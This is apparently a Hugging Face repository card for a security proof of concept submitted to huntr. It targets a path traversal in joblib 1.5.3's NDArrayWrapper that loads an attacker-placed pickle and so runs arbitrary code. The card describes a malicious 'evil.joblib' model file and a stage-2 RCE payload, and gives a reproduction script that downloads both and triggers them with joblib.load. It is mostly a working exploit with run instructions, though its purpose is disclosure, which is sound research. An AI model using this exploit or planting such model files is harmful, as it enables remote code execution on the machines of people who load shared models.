| --- |
| license: mit |
| tags: |
| - security |
| - poc |
| --- |
| # joblib NDArrayWrapper Path Traversal PoC |
|
|
| Security research PoC for huntr MFV submission. |
|
|
| **Vulnerability:** `NDArrayWrapper.read()` in `joblib/numpy_pickle_compat.py` uses an unsanitized |
| `self.filename` field (from inside the pickle) in `os.path.join()`, then calls |
| `numpy.load(filename, allow_pickle=True)` — enabling path traversal to arbitrary pickle execution. |
|
|
| **Affected version:** joblib 1.5.3 (latest) |
|
|
| ## Files |
| - `evil.joblib` — malicious model file (NDArrayWrapper with `filename="../payload.npy"`) |
| - `payload.npy` — stage-2 RCE pickle (place one directory above evil.joblib) |
|
|
| ## Reproduction |
| ```bash |
| pip3 install joblib==1.5.3 numpy |
| python3 -c " |
| import os, joblib |
| from huggingface_hub import hf_hub_download |
| os.makedirs('/tmp/poc_model', exist_ok=True) |
| hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'payload.npy', local_dir='/tmp') |
| hf_hub_download('th3-j0k3r/joblib-ndarray-poc', 'evil.joblib', local_dir='/tmp/poc_model') |
| try: joblib.load('/tmp/poc_model/evil.joblib') |
| except: pass |
| print(open('/tmp/jl_rce_proof.txt').read().strip()) |
| " |
| ``` |
|
|